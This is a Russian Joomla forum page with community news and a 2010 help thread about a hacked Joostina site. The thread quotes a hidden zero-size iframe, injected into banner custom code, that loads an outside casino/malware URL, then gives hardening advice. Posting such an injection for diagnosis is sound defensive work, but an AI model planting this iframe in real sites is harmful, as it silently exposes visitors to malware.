Новости Joomla

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🗓 Голосование продлится до 27 февраля 2026 года.

👩‍💻 Проголосовать! 👩‍💻

Номинации, в которых можно проголосовать за Joomla:
⭐️ Best Free CMS
⭐️ Best Open Source CMS
⭐️ Best Enterprise CMS

Также в номинации Best e-Commerce Solution участвуют компоненты интернет-магазинов для Joomla:
⭐️ HikaShop
⭐️ Virtuemart

В номинации Best Website Builder оказались:
⭐️ YooTheme
⭐️ SP Page Builder

Что такое CMS Critic Awards?
С 2012 года премия CMS Critic Awards занимает особое место в сообществе систем управления контентом (CMS). Это единственный в своем роде сайт, который составляет рейтинг системы управления контентом и связанных с ними решений на рынке — от малого до крупного и подчеркивает их инновации и услуги.

Каждый год награда CMS Critic Awards присуждается одному победителю в различных отраслевых категориях, таких как: «Лучшая облачная CMS», «Лучший DXP», «Лучшая Headless CMS и других. Затем результаты оглашаются через СМИ вместе с выбором редакции CMS Critic.
В этом году премия вернулась к своим традициям и только TOP-5 движков по количеству номинаций попали в 2-й этап - голосование.

@joomlafeed

👩‍💻 Релиз JoomGallery 4.3.0 - компонент галереи изображений для Joomla.

👩‍💻 Релиз JoomGallery 4.3.0 - компонент галереи изображений для Joomla.

Одна из самых популярных и старейших фото-галерей для Joomla получила новую версию.

👉 v.4.3.0. Что нового?
Панель управления для зарегистрированных пользователей. В этой версии появилась возможность каждому зарегистрированному пользователю управлять своими категориями и изображениями во фронтенде сайта.

Документация по новой функции.
Сайт проекта

@joomlafeed

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

Вы уверенно чувствуете себя перед камерой, динамичны, обаятельны и всегда улыбаетесь? Чувствуете себя искателем приключений, готовым поделиться своими исследованиями CMS Joomla!, взять интервью у видных деятелей сообщества, пообщаться лично или по видеосвязи с волонтерами Joomla или отправиться на поиски новых идей?

Joomla ищет одного или нескольких волонтеров, готовых вдохнуть новую жизнь в обсуждение Joomla, ее CMS, пользователей, сообщества и многого другого.

Возможны самые разные форматы и темы: шортсы, интервью, аналитика и разборы в режиме реального времени, быстрые советы и рекомендации, знакомство с миром Joomla, изучение открытого исходного кода... Нет никаких ограничений!

Joomla! уже активно представлена ​​во многих социальных сетях:
- 155K подписчиков на Facebook,
- 55K подписчиков на X (ранее Twitter),
- 16K подписчиков на YouTube,
- 14K подписчиков на LinkedIn,
- 5,7K подписчиков в Instagram
а так же другие площадки ждут вас. Аккаунты Threads и Bluesky относительно новые, но их популярность только растёт!

А если хватит энергии, можно рассмотреть и TikTok!

❓ Итак, вы готовы?
👉 Свяжитесь с отделом маркетинга по адресу: marketing@community.joomla.org

Подробности в статье в Joomla Community Magazine.

@joomlafeed

1   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 13 Ответов
  • 5308 Просмотров
*

smls

  • Захожу иногда
  • 137
  • 8 / 1
Хакнули сайт
« : 12.03.2010, 11:20:07 »
Стоит Джостина 1.2. Сегодня в компоненте баннеров у самого верхнего баннера исчезли настройки, а вместо них появилось в поле «свой код»:
Код
<iframe shfuw='uFIIJaTz' src='http://casionew.com/s/in.cgi?6 ' kjqlr='0nxFBg3K' width='0' height='0' style='display:none'></iframe>
У кого такое было? И что сделать, чтоб это не повторилось?
Пароль поменял, но вдруг этого недостаточно.
Записан
*

smls

  • Захожу иногда
  • 137
  • 8 / 1
Re: Хакнули сайт
« Ответ #1 : 12.03.2010, 11:27:41 »
Проверил, ещё у двух неопубликованных баннеров такая же фигня.
…сдается мне, смена пароля не поможет.
Записан
*

boston

  • Захожу иногда
  • 495
  • 222 / 3
Re: Хакнули сайт
« Ответ #2 : 12.03.2010, 12:16:50 »
В стандартном компоненте баннеров или как?
Записан
Самая новая Joostina 1.3.0.5 UTF-8 stable | О найденных ошибках сообщаем | Расширения Joostina
*

Full_crazy

  • Захожу иногда
  • 264
  • 48 / 0
  • Иногда думаю ...
Re: Хакнули сайт
« Ответ #3 : 12.03.2010, 12:48:38 »
Цитата: smls от 12.03.2010, 11:27:41
Проверил, ещё у двух неопубликованных баннеров такая же фигня.
…сдается мне, смена пароля не поможет.

а мне сдается - еще один пользователь поймал банального трояна на компьютере.
Записан
Joomla! = невозможного почти нет!
*

smls

  • Захожу иногда
  • 137
  • 8 / 1
Re: Хакнули сайт
« Ответ #4 : 12.03.2010, 13:06:58 »
Цитировать
В стандартном компоненте баннеров или как?
Да, в том, что с Джустиной шел.
Цитировать
а мне сдается - еще один пользователь поймал банального трояна на компьютере.
И как троян мог узнать куда этот код вставлять? В админку я не заходил вчера, а сегодня с утра эта фигня появилась.
В ручную тоже в неопубликованные баннеры пихать код никто не стал бы, смысла нет. Скорее в компоненте уязвимость есть
Записан
*

smls

  • Захожу иногда
  • 137
  • 8 / 1
Re: Хакнули сайт
« Ответ #5 : 12.03.2010, 13:09:31 »
Самое стремное, что Яндекс уже углядел косяк, теперь в выдаче красуется надпись: «Сайт может угрожать безопасности вашего компьютера»
Записан
*

smls

  • Захожу иногда
  • 137
  • 8 / 1
Re: Хакнули сайт
« Ответ #6 : 12.03.2010, 14:48:48 »
Каким образом можно запретить «свой код» в этом компоненте?
Записан
*

alex_seo

  • Новичок
  • 8
  • 0 / 0
Re: Хакнули сайт
« Ответ #7 : 12.03.2010, 15:43:30 »
свой компьютер на вирусу проверяли ?
Записан
*

smls

  • Захожу иногда
  • 137
  • 8 / 1
Re: Хакнули сайт
« Ответ #8 : 12.03.2010, 15:55:01 »
Kaspersky Internet Security всегда включен, обновляется регулярно.
Записан
*

smls

  • Захожу иногда
  • 137
  • 8 / 1
Re: Хакнули сайт
« Ответ #9 : 12.03.2010, 16:20:34 »
Пока что, в файле: /components/com_banners/banners.other.php
Код
Код
$result .= $banner->custom_banner_code;
Заменил на:
Код
$result .= "На странице обнаружена ошибка. Пожалуйста, сообщите об этом администратору.";
Записан
*

doctorgrif

  • Давно я тут
  • 745
  • 82 / 1
  • Нудный доктор
Re: Хакнули сайт
« Ответ #10 : 13.03.2010, 08:28:11 »
вопрос ТС:
а что стоит на сайте кроме дефолтной конфигурации  cms?
Записан
Омск-Екатеринбург-Челябинск...Feldzug gen Westen | Кафедра | GrayBox | Joostina 1.2.1 | Joostina Extensions | In Vino Veritas [в работе]
*

smls

  • Захожу иногда
  • 137
  • 8 / 1
Re: Хакнули сайт
« Ответ #11 : 13.03.2010, 10:38:47 »
Цитата: doctorgrif от 13.03.2010, 08:28:11
вопрос ТС:
а что стоит на сайте кроме дефолтной конфигурации  cms?
Вот всё что есть:
Код
Компоненты:
Blocklist	1.0 beta 1	option=com_blocklist	
community Builder	1.1	option=com_comprofiler	
EasyBook	1.1	option=com_easybook	EasyJoomla.org 
Fireboard Forum	1.0.0	option=com_fireboard	BestOfJoomla	
JCE Admin	1.1.1	option=com_jce	
JComments	2.1.0.0	option=com_jcomments	
Joomap	2.06pre	option=com_joomap	Daniel Grothe, mic/MGFI	
joomlaXplorer	1.6.1 JE	option=com_joomlaxplorer	
ProofReader	1.0 RC6	option=com_proofreader	
Remository RE	3.41	option=com_remository	
RSS экспорт	1.0.0	 	Joostina! Project	
Sigsiu Online Business Index 2	RC 2.9.1.0	option=com_sobi2	
UHP2	1.5	option=com_uhp2	John Phillips	
Баннеры	1.0 JE	 	Joostina! Project	
Голосования	1.0.0	option=com_poll	
Импорт лент новостей (RSS)	1.0.0	option=com_newsfeeds	
Календарь JCal Pro	1.5.3 Stable	option=com_jcalpro	
Массовая рассылка	1.0 JE	 	Joostina! Project	
Ссылки	1.0.0	option=com_weblinks

Модули:
mod_andyr_button	1.0	Сайт
mod_banners	1.0.0	Сайт	
mod_catcontent	1.1	
mod_dn	1.4.5	
mod_fb_last_subjects	2.8	
mod_fb_statistics	1.0	
mod_fb_users	2.1	
mod_ja_coolads	1.0.0	
mod_jcalpro_latest	1.5.3 
mod_jcomments	2.2.8	
mod_joomblog_blogger	3.0 RE	
mod_joomblog_blogside	3.0 RE	
mod_joomblog_section	3.0 RE		
mod_mainmenu	1.0.0		
mod_mostread	  1.0.0	
mod_newsflash	1.0.1	
mod_poll	1.1.0 JE	
mod_random_image	1.0.0	
mod_related_items	1.0.0	
mod_remositorymulti	3.40	
mod_search	1.0.0	
mod_sobi2latest	1.8	
mod_sobidropdown	2.0	
mod_stats	1.0.0	
mod_templatechooser	1.0.0	
mod_uhp2_featured	0.2	
mod_uhp2_latest_comments	0.1	
mod_uhp2_latest_pages	0.11	
mod_uhp2_manage	0.14	
mod_uhp2_most_popular	0.10	
mod_uhp2_newest_sites	0.9	
mod_webscreensaver	1.0.0	
mod_whosonline	1.1.0 JE	
mod_wrapper	1.0.0	
mod_jcomments_latest_backend	1.0	
mod_latest	1.0 JE	
mod_logged	1.0.0	
mod_popular	1.0.0	
mod_remositoryquicklinks	1.1.0		 
mod_stats	1.0.0
Записан
*

doctorgrif

  • Давно я тут
  • 745
  • 82 / 1
  • Нудный доктор
Re: Хакнули сайт
« Ответ #12 : 13.03.2010, 10:52:47 »
просто погугли по запросу "уязвимость в твой_компонент" - много интересного узнаешь :)
у меня joostina 1.2 стоит на всех проектах и ни разу не была подвержена взлому (тьфу-тьфу-тьфу), из стороннего лишь крайне необходимый минимум и то после гугления и устранения уязвимостей
дело не в компоненте баннеров, дело в том, что через кривое расширение был получен доступ и размещен код там, где это позволено было
значит:
читаем про права на папки/файлы, владельца
дорабатываем htaccess
удаляем ВСЕ ненужное либо обновляемся на "пролеченные" версии
срезаем права пользователям до минимально допустимых
не пользуемся потенциально опасными с точки зрения безопасности програмами для работы с сайтом (total commander, ie, etc)
читаем багтрак
« Последнее редактирование: 13.03.2010, 10:56:19 от doctorgrif »
Записан
Омск-Екатеринбург-Челябинск...Feldzug gen Westen | Кафедра | GrayBox | Joostina 1.2.1 | Joostina Extensions | In Vino Veritas [в работе]
*

Skit

  • Захожу иногда
  • 75
  • 5 / 0
  • Нет смысла в том, что ты делаешь!
Re: Хакнули сайт
« Ответ #13 : 16.04.2012, 18:16:40 »
Цитата: doctorgrif от 13.03.2010, 10:52:47
просто погугли по запросу "уязвимость в твой_компонент" - много интересного узнаешь :)
у меня joostina 1.2 стоит на всех проектах и ни разу не была подвержена взлому (тьфу-тьфу-тьфу), из стороннего лишь крайне необходимый минимум и то после гугления и устранения уязвимостей
дело не в компоненте баннеров, дело в том, что через кривое расширение был получен доступ и размещен код там, где это позволено было
значит:
читаем про права на папки/файлы, владельца
дорабатываем htaccess
удаляем ВСЕ ненужное либо обновляемся на "пролеченные" версии
срезаем права пользователям до минимально допустимых
не пользуемся потенциально опасными с точки зрения безопасности програмами для работы с сайтом (total commander, ie, etc)
читаем багтрак
Спасибо не просто за дельный совет но и за ссылку в подписи на гитхаб :)
Записан
1   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

 Ответов: 6
Просмотров: 3905 		Последний ответ 31.03.2024, 16:14:32
от SeBun
Netflix! - Клиент поймал фишинг на старый сайт. Где порылись собаки?

Автор Alex_gs

 Ответов: 9
Просмотров: 2657 		Последний ответ 05.11.2021, 21:47:31
от wishlight
Взломали сайт. Как в некоторых случаях делаю я

Автор cntrl

 Ответов: 0
Просмотров: 1508 		Последний ответ 29.08.2020, 00:25:24
от cntrl
Безопасный вход на сайт Joomla и админка

Автор jm

 Ответов: 9
Просмотров: 2637 		Последний ответ 19.07.2020, 23:57:17
от wishlight
[Руководство] Как защитить сайт на версии 1.5 (не поддерживается разработчиками)

Автор flyingspook

 Ответов: 13
Просмотров: 8300 		Последний ответ 08.01.2020, 12:52:55
от winstrool